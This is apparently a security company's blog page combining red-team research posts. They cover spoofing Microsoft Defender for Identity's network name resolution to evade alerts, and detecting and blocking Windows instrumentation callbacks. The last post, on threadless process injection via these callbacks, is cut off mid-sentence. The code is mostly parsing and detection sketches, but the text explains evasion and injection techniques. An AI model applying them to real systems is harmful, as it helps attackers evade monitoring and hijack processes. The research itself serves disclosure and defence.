Another primary method uses RDP. According to the documentation, “RDP (TCP port 3389) – only the first packet of Client hello” is used to perform the name resolution. No RDP session is established: the DfI agent, acting as a client, initiates a TLS handshake on port 3389 with the suspected attacker machine and sends the “Client Hello” message. If the machine listens on TCP port 3389, it responds with the “Server Hello” message, which includes the machine's RDP certificate with the extended key usage for server authentication, used to authenticate the server to the client. This RDP certificate can be found in the local machine's certificate store at “cert:\LocalMachine\Remote Desktop”. By default, it is an auto-generated self-signed certificate with the FQDN of the machine as subject and issuer. The purpose is the same as with NetBIOS: obtaining domain and host information about a machine to compare it with the information provided in the discussed attacks, such as pass-the-cert for domain controllers, ESC8 or DCSync. This time, however, DNS-related information is obtained: the subject of the provided certificate is used to resolve the IP address of a potential attacker machine to host and domain names.
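Once the certificate subject is known, turning it into host and domain names is straightforward. The sketch below assumes the subject is already available as a simple RFC 4514-style string without escaped characters; a real implementation would parse the X.509 certificate with a proper library. Both helper names are hypothetical.

```python
def cn_from_subject(subject: str) -> str:
    """Hypothetical helper: return the CN of a simple subject such as 'CN=PC02.jsc.lab'."""
    for rdn in subject.split(","):
        key, _, value = rdn.strip().partition("=")
        if key.strip().upper() == "CN":
            return value.strip()
    raise ValueError("subject has no CN")


def host_and_dns_domain(fqdn: str):
    """Hypothetical helper: 'PC02.jsc.lab' -> ('PC02', 'jsc.lab')."""
    host, _, domain = fqdn.partition(".")
    return host.upper(), domain.lower()


print(host_and_dns_domain(cn_from_subject("CN=DC02.jsc.lab")))  # ('DC02', 'jsc.lab')
```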

DfI accepts the certificate and extracts the machine's FQDN from it even if it is self-signed, which makes it possible to answer the NNR request with a spoofed, self-signed certificate. Alternatively, the attacker could relay the request to the desired target, which requires the RDP port to be open on that target.

In the following image the flow can be seen using a spoofed certificate indicating that PC02’s (172.16.94.11) FQDN is DC02.jsc.lab:

Figure 24: Connection to port 3389 on PC02 by DfI
Figure 25: Spoofed certificate in RDP NNR method

NTLM over RPC

The last primary method uses the endpoint mapper on TCP port 135. When a client needs to call a Windows service, for example WMI, it first contacts the endpoint mapper on port 135 to discover on which dynamic port the requested service is listening. The mapper returns that high port, and the client connects to it to complete the RPC exchange. In the case of DfI, a bind request is sent to the suspected malicious machine, asking to bind to the Name Service Provider Interface (NSPI) RPC interface while using the NTLM security provider for authentication. The response from the suspected machine contains the information relevant to DfI; details about the RPC interface and the bind itself are irrelevant, since DfI only cares about the information required to resolve host and domain names. This information is contained in the NTLM negotiation: besides the NTLM server challenge, the machine provides its NetBIOS and DNS names to DfI. At this point, no authentication has taken place between DfI and the machine, and these messages carry no tamper protection. This also allows these messages to be manipulated and spoofed to evade NNR-based detection. The two messages exchanged can be seen below:

Figure 26: NTLM over RPC NNR method
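In the NTLM CHALLENGE_MESSAGE, these names are carried in the TargetInfo field as a list of AV_PAIR structures (MS-NLMP, section 2.2.2.1): a little-endian two-byte AvId, a two-byte AvLen and a UTF-16LE value, terminated by MsvAvEOL. A minimal parsing sketch, assuming the TargetInfo bytes have already been cut out of the challenge message using its TargetInfoFields offset and length; the sample values mirror PC02 but are constructed, not captured, and `av_pair` is a hypothetical helper.

```python
import struct

# AvId values from MS-NLMP 2.2.2.1 that carry names
AV_NAMES = {
    1: "MsvAvNbComputerName",
    2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName",
    5: "MsvAvDnsTreeName",
}


def parse_target_info(target_info: bytes) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, Value) and decode the name fields."""
    names, offset = {}, 0
    while offset + 4 <= len(target_info):
        av_id, av_len = struct.unpack_from("<HH", target_info, offset)
        offset += 4
        if av_id == 0:  # MsvAvEOL ends the list
            break
        value = target_info[offset:offset + av_len]
        offset += av_len
        if av_id in AV_NAMES:  # other pairs, e.g. MsvAvTimestamp (7), are skipped
            names[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return names


def av_pair(av_id: int, text: str) -> bytes:
    """Hypothetical helper that encodes one name AV_PAIR for the sample."""
    data = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


sample = (av_pair(1, "PC02") + av_pair(2, "JSC") + av_pair(3, "PC02.jsc.lab")
          + av_pair(4, "jsc.lab") + struct.pack("<HHQ", 7, 8, 0) + struct.pack("<HH", 0, 0))
print(parse_target_info(sample)["MsvAvNbComputerName"])  # PC02
```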

Secondary method: DNS lookup

When the primary methods (NetBIOS, RDP, NTLM over RPC) fail, a DNS lookup is used. This is the case if none of the primary methods responds or if the responses from two or more primary methods conflict. Inspecting the DfI agent with Procmon shows the following behavior:

Figure 27: Secondary method: DNS lookup

The upper highlighted area shows the three primary methods; no connection to “PC02” could be established over these protocols, so no NNR response is received. The second area shows that the DfI agent makes two DNS requests. The exact requests can be seen in Wireshark when monitoring the loopback interface on DC01:

Figure 28: DNS lookup by DfI agent

The first request is a reverse DNS lookup, using the IP address from which the suspected attack originated to receive the hostname of the machine. The second request is a forward DNS lookup using the received hostname, serving as a secondary verification step to check whether the initial IP address is returned again.
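The reverse-then-forward verification can be reproduced with Python's standard socket functions. A sketch under the assumption that a mismatch between the forward result and the original IP counts as a failed resolution (how DfI handles this case was not verified); the resolvers are injectable so the logic can be tried without a live DNS server, and `dns_secondary_check` is a hypothetical name.

```python
import socket


def dns_secondary_check(ip, reverse=socket.gethostbyaddr, forward=socket.gethostbyname_ex):
    """Hypothetical check: reverse-resolve ip, then forward-resolve the name and require ip in the answer."""
    try:
        hostname, _, _ = reverse(ip)           # PTR lookup: IP -> hostname
        _, _, forward_ips = forward(hostname)  # A lookup: hostname -> IPs
    except OSError:                            # socket.herror / socket.gaierror
        return None
    return hostname if ip in forward_ips else None


# Stubbed resolvers standing in for the domain's DNS server
print(dns_secondary_check(
    "172.16.94.11",
    reverse=lambda ip: ("PC02.jsc.lab", [], [ip]),
    forward=lambda name: (name, [], ["172.16.94.11"]),
))  # PC02.jsc.lab
```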

Reviewing the impact of NNR vulnerability

The previous sections showed how the flaw in NNR can be exploited to evade alerts that rely on NNR. The impact of this vulnerability can also be gauged by the number of affected alerts. Microsoft writes: “NNR data is crucial for detecting the following threats:”

  • Suspected identity theft (pass the ticket)
  • Suspected DCSync attack (replication of directory services)
  • Network-mapping reconnaissance (DNS)

This means that at least three alerts depend on NNR to be triggered. The DCSync alert appears in this list, but two additional alerts that rely on NNR, as previously discussed, do not. These are the ADCS-ESC8 alert "Suspicious Domain Controller certificate request (ESC8)" and the pass-the-cert alert for domain controller machine accounts, "Suspected suspicious Kerberos ticket request". This makes at least five alerts in total, and more alerts may use NNR as a detection technique.

It should be noted that NNR works this way only in DfI version 2.X. DfI version 3.0 also uses NNR but does not involve the attacker machine in its detection logic. Instead, name resolution is performed against the Defender device inventory, which is outside the attacker's control. The device inventory is a centralized overview of all discovered devices in the organization. It is populated by several Microsoft security products, such as DfI and Defender for Endpoint.

Defender for Identity deployment overview

To get a better idea of the risk posed by NNR, it is worth checking which Windows servers can run the DfI sensor in version 3.0 and which remain on version 2.2.

Figure 29: DfI sensor deployment overview (https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity)

First, only domain controllers can use the sensor in version 3.0. The CA, federation server and Entra Connect server remain on sensor version 2.2. Alerts that are generated by the DfI sensors on these servers and depend on NNR can therefore still be evaded.

Domain controllers can only use version 3.0 if they run Windows Server 2019 or later and Microsoft Defender for Endpoint is enabled on them.
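These deployment rules can be turned into a quick inventory check. The sketch encodes only the conditions stated in this section. It flags every server whose sensor stays on version 2.2 and therefore still relies on the attacker-influenced NNR. The struct, the role names and the example host names are hypothetical.

```cpp
#include <cassert>
#include <string>
#include <vector>

enum class Role { DomainController, CertificateAuthority, FederationServer, EntraConnect };

struct Server {
    std::string name;
    Role role;
    int windows_server_year;  // e.g. 2016, 2019, 2022
    bool mde_enabled;         // Microsoft Defender for Endpoint enabled
};

// Sensor version according to the conditions described in the text.
std::string sensor_version(const Server& s) {
    if (s.role == Role::DomainController && s.windows_server_year >= 2019 && s.mde_enabled)
        return "3.0";
    return "2.2";
}

// Servers whose sensor still performs the 2.x-style NNR.
std::vector<std::string> nnr_exposed(const std::vector<Server>& servers) {
    std::vector<std::string> out;
    for (const auto& s : servers)
        if (sensor_version(s) == "2.2") out.push_back(s.name);
    return out;
}
```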

Disclosure to Microsoft MSRC

A security advisory about the flaw in the core NNR feature affecting DfI version 2.2 was submitted to Microsoft via the MSRC portal on February 22, 2026. Microsoft did not acknowledge it as a vulnerability and assessed it as below the bar for immediate servicing. As far as MSRC's answer can be interpreted, no fix will be issued.

Conclusion

While this blog post focused on alerts that could be evaded, this conclusion summarizes the findings of these investigations. DfI's biggest problem is that it involves the suspected attacker in its detection logic and bases decisions on indicators the attacker controls. This can be observed in the pass-the-cert alert, where DfI attempts to detect the attack through attacker-controlled indicators. It also shows in the reliance on information from self-signed certificates under the attacker's control, such as the age of a certificate, which is used to decide whether further detection logic needs to be applied. The NNR method using RDP likewise relies on information from self-signed certificates and bases decisions on it.

The general problem with the NNR feature in DfI version 2.2 is that it involves the suspected attacker machine while using techniques that do not provide authentication or tamper protection, thereby giving malicious actors the possibility to evade NNR-based detection logic.

Using a trusted database, such as the Defender device inventory, to resolve raw IP addresses to hostnames is a good approach, since it cannot be interfered with by a malicious actor, but it should be available in all DfI versions, not only version 3.0.

Despite these technical issues, and although Microsoft does not consider them vulnerabilities and has no plans to make any changes, security professionals can still take steps to improve security and detectability. This will be described in the second blog post: Microsoft Defender for Identity evasions in 2026 – Part II.

References

  1. https://www.synacktiv.com/publications/a-dive-into-microsoft-defender-for-identity
  2. https://www.synacktiv.com/publications/understanding-and-evading-microsoft-defender-for-identity-pkinit-detection
  3. https://learn.microsoft.com/en-us/defender-for-identity/nnr-policy
  4. https://learn.microsoft.com/en-us/defender-xdr/pilot-deploy-overview
  5. https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
  6. https://learn.microsoft.com/en-us/defender-for-identity/deploy/deploy-defender-identity
  7. https://blog.redteam-pentesting.de/2025/windows-coercion/
  8. https://en.hackndo.com/ntlm-relay/#preliminary
Red Teaming

Microsoft Defender for Identity evasions in 2026 – Part I

June 16, 2026 – Microsoft Defender for Identity (DfI) is one of Microsoft’s key solutions for detecting identity-based attacks in Active Directory environments – but how well does it hold up against a skilled attacker? This two-part blog post dives into DfI’s detection capabilities for high-impact attacks such as shadow credentials, pass-the-cert, ESC8, and DCSync. Additionally, it uncovers a spoofing and relaying vulnerability in DfI’s Network Name Resolution component that can be used to evade multiple alerts, and offers blue team perspectives on closing these gaps.


Author: Jakob Scholz

Red Teaming

Windows Instrumentation Callbacks – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Do you want to protect your systems? Feel free to get in touch with us.

February 10, 2026

Windows Instrumentation Callbacks – Detection and Countermeasures, Part 4

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you don’t yet know what ICs are, we strongly recommend you read the first part of this series. If you are curious about what can be done with them, we recommend also reading the second and third part.

In this blog post we will cover ICs from a more theoretical standpoint, mainly the restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.

Detection

In the first blog post we reversed NtSetInformationProcess and found that the PROCESSINFOCLASS enum value 0x28 is used to set an IC. In the kernel, the InstrumentationCallback member of the corresponding KPROCESS structure is then set to the passed callback address. This of course means that a kernel driver could simply inspect the process's KPROCESS structure to determine whether an IC is set. Before we move on to user-mode ways of detecting ICs, let's cover something we haven't in any of the previous posts: unregistering ICs.
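For reference, the user-mode side of setting an IC looks roughly as follows. The structure layout (Version, Reserved, Callback) and the class value 0x28 (ProcessInstrumentationCallback) follow community headers such as phnt, not official documentation. Zero for Version and Reserved on x64 is an assumption of this sketch. The Windows-only part resolves NtSetInformationProcess from ntdll at runtime. Passing nullptr as the callback is the "unset" attempt discussed next.

```cpp
#include <cassert>
#include <cstdint>

// ProcessInstrumentationCallback, the PROCESSINFOCLASS value used to set an IC.
constexpr unsigned long kProcessInstrumentationCallback = 0x28;  // 40

// Mirrors PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION as defined in
// community headers (undocumented by Microsoft).
struct IcInfo {
    uint32_t version;   // assumed 0 on x64
    uint32_t reserved;  // assumed 0
    void* callback;     // IC entry point, or nullptr to try to unset it
};

inline IcInfo make_ic_info(void* callback) { return IcInfo{0, 0, callback}; }

#ifdef _WIN32
#include <windows.h>
using NtSetInformationProcessFn = LONG(NTAPI*)(HANDLE, ULONG, PVOID, ULONG);

// Sets (or, with nullptr, tries to unset) the IC of the current process.
// Returns the NTSTATUS, or -1 (chosen by this sketch) if ntdll's export is missing.
LONG set_instrumentation_callback(void* callback) {
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    if (!ntdll) return -1;
    auto fn = reinterpret_cast<NtSetInformationProcessFn>(
        GetProcAddress(ntdll, "NtSetInformationProcess"));
    if (!fn) return -1;
    IcInfo info = make_ic_info(callback);
    return fn(GetCurrentProcess(), static_cast<ULONG>(kProcessInstrumentationCallback),
              &info, static_cast<ULONG>(sizeof(info)));
}
#endif
```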

Unregistering ICs

We thought: "How hard can it be? We can simply call NtSetInformationProcess with a null pointer to unset it." Correct… sometimes. If the process uses Control Flow Guard (CFG), your IC stays set, because a null pointer is not a valid call target. In the first blog post we already mentioned that ntoskrnl!NtSetInformationProcess+0x1d09 is where the callback address is set in the KPROCESS structure, so let's go there in the decompiler. Here, we renamed the relevant stack variable that contains the callback address to "ic_addr". The decompiled code shows that MmValidateUserCallTarget is called with that address before it is written to KPROCESS.

Decompiling MmValidateUserCallTarget quickly shows that it is tied to CFG: it calls MiIsProcessCfgEnabled and, if CFG is not enabled for the process, simply returns 1.

A null pointer is very obviously not a valid call target. Still, let's quickly prove that the validation fails by using a kernel debugger and placing a breakpoint on NtSetInformationProcess+0x1ccc, which is where MmValidateUserCallTarget is called. We also placed a breakpoint on NtSetInformationProcess+0x1d09 to show where the IC is set in the KPROCESS struct. As can be seen, when the address of the IC is passed to MmValidateUserCallTarget, the function returns 1 and KPROCESS is updated. However, when a null pointer is passed, 0 is returned.

You can't see whether KPROCESS is updated after the last g command, so you will have to take our word that it isn't. The previously shown decompilation of NtSetInformationProcess confirms this: the code branch that updates KPROCESS isn't even executed, and ExReleaseRundownProtection is called instead.

This means that an IC can only be entirely unregistered (set back to 0) if a process doesn't have CFG enabled. Otherwise, it can only be updated to a new valid call target and can never be set back to the value the InstrumentationCallback member had at process start: 0. While any valid call target's address can be used, it should be selected carefully, as most targets will of course crash the program by executing unrelated code. The updated callback still needs to do what is expected of an IC, which is to continue execution by jumping to r10. This also means that if a DLL loaded into a CFG-enabled process sets an IC whose callback lies in the DLL's own memory, the process will crash once that DLL is unloaded and its memory, including the callback, is freed. To avoid the crash, the callback would need to be updated to another valid target before the DLL is unloaded.

For CFG-enabled processes, it is thus not possible to hide from kernel-mode drivers that an IC was set, as they can simply check whether KPROCESS.InstrumentationCallback != 0. For non-CFG processes, the InstrumentationCallback member can be restored to its original value.
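These consequences can be summarized in a toy model. The sketch below is not kernel code. It only mimics the decision described above: with CFG enabled, the new callback address must pass MmValidateUserCallTarget (modeled here as a set lookup), and otherwise the KPROCESS member is left untouched. The set of valid call targets and all addresses are made up.

```cpp
#include <cassert>
#include <cstdint>
#include <set>

// Toy model of the IC-setting branch in NtSetInformationProcess.
struct ProcessModel {
    bool cfg_enabled;
    std::set<uintptr_t> valid_call_targets;  // stands in for the CFG bitmap
    uintptr_t instrumentation_callback = 0;  // KPROCESS.InstrumentationCallback

    // Mirrors MmValidateUserCallTarget: without CFG, every address passes.
    bool validate(uintptr_t addr) const {
        return !cfg_enabled || valid_call_targets.count(addr) != 0;
    }

    // Returns true if the member was updated; on failure it keeps its old value.
    bool set_ic(uintptr_t addr) {
        if (!validate(addr)) return false;
        instrumentation_callback = addr;
        return true;
    }
};
```

With CFG, the model can only swap one valid target for another. Without CFG, it can be reset to 0.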

In addition, enabling CFG makes ICs easier to detect at scale, as poorly written IC implementations will crash the process, which is recorded in the event logs. This is of course not great, but what's better? Processes crashing, which indicates something weird is going on, or working processes with an attacker's code inside?

User mode

That it is possible to detect from kernel mode whether an IC is set was obvious, since we already discussed in the first part that it's merely a member of the process's KPROCESS structure. The far more interesting scenario is detecting from user mode whether an IC is set on one's own process. If you step through the process with a debugger, you will obviously be able to tell that an IC is registered when stepping over a syscall causes the code flow to magically jump somewhere else. Let's look at other ways.

If an IC is set with NtSetInformationProcess, the logical way of checking whether an IC is set would be to call NtQueryInformationProcess. However, when we disassemble/decompile NtQueryInformationProcess and look at the switch on its second parameter, the PROCESSINFOCLASS, we can see that querying this class is not implemented. This is shown by the following shortened decompilation:

NtQueryInformationProcess(arg1, proc_info_class, …)
[…]
+0x002b        int64_t proc_info_class_copy = (int64_t)proc_info_class;
[…]
+0x02f9            switch (proc_info_class_copy) {
[…]
+0x3bf6                case 5:
+0x3bf6                case 6:
+0x3bf6                case 8:
+0x3bf6                case 9:
+0x3bf6                case 0xb:
+0x3bf6                case 0xd:
+0x3bf6                case 0x10:
+0x3bf6                case 0x11:
+0x3bf6                case 0x19:
+0x3bf6                case 0x23:
+0x3bf6                case 0x28:
+0x3bf6                case 0x29:
+0x3bf6                case 0x30:
+0x3bf6                case 0x35:
+0x3bf6                case 0x38:
+0x3bf6                case 0x39:
+0x3bf6                case 0x3e:
+0x3bf6                case 0x3f:
+0x3bf6                case 0x44:
+0x3bf6                case 0x4e:
+0x3bf6                case 0x50:
+0x3bf6                case 0x53:
+0x3bf6                case 0x56:
+0x3bf6                case 0x5a:
+0x3bf6                case 0x5b:
+0x3bf6                case 0x5d:
+0x3bf6                case 0x5f:
+0x3bf6                {
+0x3bf6                    result = -0x3ffffffd;
+0x3bf6                    break;
+0x3bf6                }
[…]

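As you might remember, we used 0x28 for setting the IC. It is one of the cases above, so NtQueryInformationProcess simply returns -0x3ffffffd, that is, 0xC0000003 (STATUS_INVALID_INFO_CLASS).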
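The decompiler prints the status as a signed 32-bit integer. Reinterpreting the bits as an unsigned NTSTATUS turns it into a recognizable code, and the top two bits (severity 3) mark it as an error. This is what the NT_ERROR macro tests. A small compile-time check, with illustrative helper names:

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kStatusInvalidInfoClass = 0xC0000003;  // STATUS_INVALID_INFO_CLASS

// Converts the signed value shown by the decompiler into the NTSTATUS bit pattern.
constexpr uint32_t as_ntstatus(int32_t decompiled) {
    return static_cast<uint32_t>(decompiled);
}

// NTSTATUS severity is stored in bits 30-31; 3 means error.
constexpr uint32_t severity(uint32_t status) { return status >> 30; }

static_assert(as_ntstatus(-0x3ffffffd) == kStatusInvalidInfoClass, "0xC0000003");
static_assert(severity(kStatusInvalidInfoClass) == 3, "error severity");
```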

This means we can't use NtQueryInformationProcess to find out whether an IC is set. We don't know of any user-mode function that allows querying for the IC, although that of course does not mean none exists. By dumping kernel memory, we could again read out the KPROCESS structures to check for ICs, but this would obviously require a driver or some other way to execute code in the kernel, riiiight Microsoft? There is a way (or are there ways?) of dumping kernel memory, including the KPROCESS structures, entirely from user mode without loading any drivers yourself. We won't tell you how this is done, as we are already spoon-feeding you enough 😉 Additionally, that would be a moral gray area; we want to keep EDRs/ACs a step ahead of attackers.

rcx and r10

In the first blog post we briefly recommended attaching a debugger to a program with and without an IC set to compare register values after syscalls, but we didn't dive deeper into it. I attached WinDbg to a random process and set a breakpoint on a random syscall (ntdll!NtWriteVirtualMemory+0x12). As can be seen in the following screenshot, rcx was changed to the address of the instruction after the syscall, that is, the ret instruction. Also, r10 was zeroed.

Now compare this to the following screenshot, which was taken after an IC was set:

As expected, r10 now contains the actual return address. The screenshot also shows that rcx contains the start address of the IC instead of the actual return address.

This means we can detect poorly written ICs by checking rcx and r10 at the ret instruction after the syscall, that is, the instruction that would normally execute next if no IC was set. The IC can of course set these registers to arbitrary values, but its author needs to keep this in mind. If rcx isn't properly restored, it not only leaks that an IC is set but also where it is located in memory. That could be used to automatically dump the IC, or for something even more interesting, which we will get to.
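The check can be expressed as a small classifier over the registers observed at that ret instruction. The sketch leaves out how the registers are captured (debugger, hardware breakpoint or similar), and the struct and function names are hypothetical. It encodes the observations above: without an IC, rcx holds the address of the ret and r10 was observed as zero, while a sloppy IC leaves its own entry point in rcx.

```cpp
#include <cassert>
#include <cstdint>

struct PostSyscallRegs {
    uint64_t rip;  // address of the ret following the syscall instruction
    uint64_t rcx;
    uint64_t r10;
};

enum class IcVerdict { NoneObserved, IcSuspected };

// Without an IC, the syscall leaves rcx == rip and (as observed) r10 == 0.
// Anything else suggests an IC ran without restoring these registers.
IcVerdict classify(const PostSyscallRegs& r, uint64_t* leaked_ic = nullptr) {
    if (r.rcx == r.rip && r.r10 == 0) return IcVerdict::NoneObserved;
    if (leaked_ic && r.rcx != r.rip) *leaked_ic = r.rcx;  // likely the IC entry point
    return IcVerdict::IcSuspected;
}
```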

Preventing ICs from getting set

If it is hard to detect whether an IC is set, we could try to prevent others from setting one in the first place. This is not easy to do. Let's assume two different starting points for an attacker: either he is inside the process on which he wants to set an IC, or he is in another process. If the attacker is already in the kernel, you have entirely different problems, so we will not discuss that case.

One’s own process context

In the second part of this blog series, we already discussed one way of preventing the IC from being overwritten: hooking NtSetInformationProcess. Against a simple attacker this suffices; however, the hook can be bypassed through direct and indirect syscalls. Even if the syscall instruction in NtSetInformationProcess is hooked, an attacker could use the syscall instruction of another Windows API function to avoid the hook. This would mess up the call stack, but detecting that would require a kernel driver: once the syscall has executed and returned to user mode, the new IC is already set. Another idea is to place a page guard on the memory page of NtSetInformationProcess after registering an appropriate exception handler. This would detect reads of the SSN (system service number) of NtSetInformationProcess or of nearby syscalls, but it would take a toll on performance.

Another detection mechanism is a heartbeat. The originally set IC could increment a counter on every execution, while regular code outside the IC checks every few seconds whether the counter was incremented. Since most programs make syscalls constantly, a counter that hasn't been incremented in a while means the IC was overwritten. The program could then try to re-register its own IC, which is not guaranteed to succeed, but it can again use the counter to detect whether re-registering was successful.
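Below is a minimal sketch of the heartbeat idea. It assumes that the legitimate IC increments a shared counter on every invocation, so the monitor only needs to remember the last value it saw. The names are hypothetical. The watchdog thread, its timing and the re-registration are left out, so the logic can be exercised without a real IC.

```cpp
#include <atomic>
#include <cassert>
#include <cstdint>

// Assumed to be incremented by the legitimate IC on every invocation.
std::atomic<uint64_t> g_ic_heartbeat{0};

class HeartbeatMonitor {
public:
    explicit HeartbeatMonitor(const std::atomic<uint64_t>& counter)
        : counter_(counter), last_(counter.load()) {}

    // Called periodically (e.g. every few seconds) from regular, non-IC code.
    // Returns false if the IC did not run since the previous check.
    bool check() {
        uint64_t now = counter_.load();
        bool alive = now != last_;
        last_ = now;
        return alive;
    }

private:
    const std::atomic<uint64_t>& counter_;
    uint64_t last_;
};
```

As the text points out, this only works if the program makes syscalls regularly. An idle interval looks exactly like an overwritten IC.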

If the attacker's IC is tailored to the program, he could of course increment that counter himself. Even more interesting: if the previous IC's address was leaked through the aforementioned ways, the attacker's IC could call the previous IC while filtering what is passed to it. This means that hiding where an IC is set matters not only for attackers but also for defenders, as there's no reliable way of being entirely sure that your IC is the registered one. At this point we are talking about a very sophisticated attacker, as the IC would need to be highly adapted. If the victim process does not repeatedly dump the IC address itself (very unlikely), it has no way of knowing whether its own IC was overwritten. Any detection logic in that IC still runs, because the new, actually registered IC calls it.
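A simulation shows why the heartbeat cannot tell the difference. The sketch below models callbacks as plain functions, with no real IC involved, and all names are hypothetical. Once an attacker callback forwards every invocation to the previous one, the defender's counter keeps increasing, so the monitoring logic sees nothing unusual.

```cpp
#include <cassert>
#include <functional>
#include <vector>

// Toy model only: a callback "slot" invoked after every simulated syscall.
using Callback = std::function<void(int syscall_id)>;

struct ProcessSim {
    Callback ic;  // stands in for KPROCESS.InstrumentationCallback
    void do_syscall(int id) {
        if (ic) ic(id);
    }
};

// Attacker side: replace the slot but forward every invocation to the
// previous callback, so its side effects (such as a heartbeat) still happen.
// Filtering of what gets forwarded could be added here.
Callback chain(Callback previous, std::vector<int>* intercepted) {
    return [previous, intercepted](int id) {
        intercepted->push_back(id);
        if (previous) previous(id);
    };
}
```

After three simulated syscalls, the defender's heartbeat reads 3, even though the last two were routed through the attacker's callback first.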

Other process context

As initially mentioned, setting an IC on another process requires the SeDebugPrivilege, which is a very powerful privilege. If the user does not have it, there is no way for him to set an IC on another process. This means that properly hardening your environment and stripping users of unneeded privileges is also the best defense against ICs being set on other processes.

Let's assume the user has the SeDebugPrivilege. In that case, the victim process can't do much against an IC being set other than repeatedly scanning for open handles to itself and closing those that grant the PROCESS_SET_INFORMATION access right. This contains a race condition, as with the right timing an IC can still be set. Of course, once the IC is set, the detection mechanisms mentioned in "One's own process context" apply again.
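The filtering step of such a scan comes down to an access-mask test. This sketch assumes the handle entries have already been collected, for example via NtQuerySystemInformation with a handle-information class, which is not shown. It also assumes that each entry has been resolved to the process it refers to, which is non-trivial in practice. The entry struct is hypothetical. PROCESS_SET_INFORMATION is 0x0200 in winnt.h. Closing the handles in their owning processes is out of scope.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr uint32_t kProcessSetInformation = 0x0200;  // PROCESS_SET_INFORMATION

// Simplified view of one entry from a system-wide handle snapshot.
struct HandleEntry {
    uint32_t owner_pid;       // process holding the handle
    uint32_t target_pid;      // process the handle refers to (assumed resolved)
    uint32_t granted_access;  // access mask granted to the handle
};

// Handles held by other processes that would allow setting an IC on self_pid.
std::vector<HandleEntry> risky_handles(const std::vector<HandleEntry>& snapshot, uint32_t self_pid) {
    std::vector<HandleEntry> out;
    for (const auto& h : snapshot)
        if (h.target_pid == self_pid && h.owner_pid != self_pid &&
            (h.granted_access & kProcessSetInformation))
            out.push_back(h);
    return out;
}
```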

Closing words

This marks the end of this blog series. Congratulations if you read through all of it! If you have questions or build upon this research (there's still a lot to discover with ICs), feel free to reach out.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Reverse Engineering

Windows Instrumentation Callbacks – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

January 28, 2026

Windows Instrumentation Callbacks – Injections, Part 3

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

If you have not yet read the first and second parts of this series, we strongly recommend reading them to find out what ICs are and how to set them.

In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This series is aimed at x64 programs on the Windows versions 10 and 11. Neither older Windows versions nor WoW64 processes will be discussed.
  • This post contains much assembly code; don’t be a script kiddie – take your time to understand what you’re doing instead of just copy-pasting!

Recap

In the first blog post we learned how to install an IC on a process and how to use that callback to interact with specific syscalls.

We learned this through the example of intercepting the syscall that OpenProcess makes in its subfunction NtOpenProcess. After intercepting NtOpenProcess, we closed the handle that was opened and spoofed a return value of STATUS_ACCESS_DENIED.

In the second part of the series, we learned how to hook arbitrary code in the current process context with ICs using exceptions.

However, we haven't yet set an IC on another process, even though we learned in the first part of this series that this should be possible with the SeDebugPrivilege. Since the IC is executed as a callback on every returning syscall, setting an IC on another process means getting code execution in that process's context, which can be used for a process injection.

Process injection

If you understood the blog series so far, you very likely know what a process injection is. Let's break down what a regular process injection, that is, injecting code into another process, normally needs. Every process has its own virtual address space, so an address taken from one process does not point into another process's memory. Depending on how familiar you are with virtual memory, this may or may not surprise you. The code therefore needs to be written into the other process. To do that, you need a handle to the process with sufficient access rights, and you need to know where to write the code. For this you normally have two options: allocating memory in the other process or overwriting an existing executable memory region. Once the code is in an executable memory region, it needs to be executed. The most basic process injections use the CreateRemoteThread function for this. Other execution mechanisms include API hooking, early bird APC injection and thread hijacking. There are many ways, but they all effectively just execute the written code. Multiple websites collect different execution mechanisms; however, most don't include ICs. While researching ICs, I found a blog post by Black Lantern Security about detecting process injections. They briefly mentioned using ICs for call stack analysis to detect injections, which is a great use case, but ICs can also be used for exactly what they are supposed to detect. As a bonus, injecting this way overwrites their IC, basically removing those security checks. In the next part of this blog series, we will cover ICs from a more defensive standpoint, including how to protect your own IC from being overwritten.

I also found a blog post by splinter_code, who had apparently already written about using ICs for process injections in 2020. Don't worry, we will of course expand on that and not copy his work. How complicated your IC injection code needs to be depends heavily on your payload. If, for example, you only want to make one WinExec call and your payload consists of roughly ten assembly instructions, this won't add much overhead to your program. You could just call the payload directly in the IC (assuming you added a way to disable syscall recursion in the IC). However, once you use a payload that doesn't return quickly, for example a C2 agent, the program will stop working or run into issues, because a required thread was hijacked. splinter_code solved this by creating a new thread, which is a valid approach. However, I wanted to avoid thread creation callbacks. So, how do we execute code without spawning a new thread and without blocking the thread that called the IC for long? By spawning a process instead. Just kidding: let's reuse the hooking method from the previous blog post and hook a thread exit to hijack the thread. Threadless injections are no novel concept, but they normally use byte patches or register an exception handler for patchless hooking. Using ICs, we can avoid registering an exception handler. In our case we still set a hardware breakpoint, but you could 